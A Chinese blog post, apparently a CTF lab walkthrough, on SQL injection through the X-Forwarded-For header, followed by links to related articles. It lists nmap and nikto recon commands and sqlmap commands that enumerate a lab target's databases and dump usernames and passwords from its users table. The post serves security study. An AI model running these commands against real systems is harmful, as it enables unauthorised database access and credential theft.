CTF-sql注入(X-Forwarded-For)【简单易懂】
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
环境配置
信息探测
AWVS漏洞扫描
漏洞利用
扫描数据库
扫描表名
扫描字段值
扫描用户名和密码
环境配置
kali 192.168.20.128
靶机 192.168.20.132
链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ
提取码:4p7w
信息探测
nmap -sV ip
nmap -A -v ip
nikto -host http://ip 探测敏感信息
AWVS漏洞扫描
链接:https://pan.baidu.com/s/1o_2nXdQOuDFE8jI1uQdPiw
提取码:jsdx
漏洞利用
扫描数据库
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" --dbs --batch
扫描表名
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
扫描字段值
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
扫描用户名和密码
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C 'login,password' --dump --batch
CTF-sql注入(X-Forwarded-For)【简单易懂】相关推荐
- SQL注入详解和简单绕过原理
1.什么是SQL 结构化查询语言(Structured Query Language)简称SQL SQL使我们有能力访问数据库 2.什么是SQL注入 用户提交的数据可以被数据库解析执行 如果用户随随便 ...
- [CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
文章目录 关于SQL注入的思维导图可以看一下 一.SQL注入介绍 (一)注入流程 (二)MySQL常用函数与参数 二.SQL注入基本知识 1.寻找注入点 分析 判断 2.联合查询注入 (1)什么是联合 ...
- CG CTF 南邮CTF SQL注入2
SQL注入2 分析源码 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' ...
- SQL注入原理及过程简单介绍
1.产生SQL注入原因 开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤.SQL 注入过程目的性是非常 ...
- CTF SQL注入知识点
理解常用的登录判断 select * from user where username='admin' and password='123' 数据库元信息 infomation_schema 懂PHP ...
- linux json 写sql注入,sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery)) 0x1 网上搜下没有关于ajax的sql注入文章,这里简单写一下抛砖引玉. 原理自己百度,这里简单说下: 通过 ...
- SQL注入实验,PHP连接数据库,Mysql查看binlog,PreparedStatement,mysqli, PDO
看到有人说了判断能否sql注入的方法: 简单的在参数后边加一个单引号,就可以快速判断是否可以进行SQL注入,这个百试百灵,如果有漏洞的话,一般会报错. 下面内容参考了这两篇文章 http://blog ...
- 基于pikachu漏洞平台的 --SQL注入攻击学习与总结
SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...
- Java -- SQL注入
为什么会产生SQL注入问题 举一个简单的SQL注入攻击的例子: 假如我们有一个users表,里面有两个字段username和password.在我们的java代码中我们初学者都习惯用sql拼接的方式进 ...
- 批量挖sql注入漏洞
这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在. 关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候, ...
最新文章
- ABAP在ALV工具栏显示一个计时器
- asp.net的资料
- CCF之地铁修建(100分)
- [C# 项目实战]: 制作一个备忘录(经典)
- Linux02进程内存管理
- Request的getHeader()和getParameter()的区别
- 史上最大多模态图文数据集发布!
- python发短信脚本_python脚本发送短信
- 统计学习方法读书笔记9-朴素贝叶斯习题
- 山西省计算机商务学校地址,山西计算机等级考试报名地点
- lanproxy搭建内网穿透
- python表情换头_教你用Python制作表情包,实现换脸技术!
- 云防护当道,如何绕过云防护来进行渗透测试
- 基于JAVA宠物用品交易网站计算机毕业设计源码+系统+lw文档+部署
- 实时计算 java基础:类的结构之五:内部类
- OSWE 尾篇 考试的方法论
- 零基础入门python web 自动化测试_python web自动化测试,入门篇
- ncut算法matlab程序,Ncut算法的MATLAB代码下载及实现在MATLAB上正常运行
- 【MQTT】Windows:安装MQTT
- 第四篇 再读Spring 之BeanDefinition注册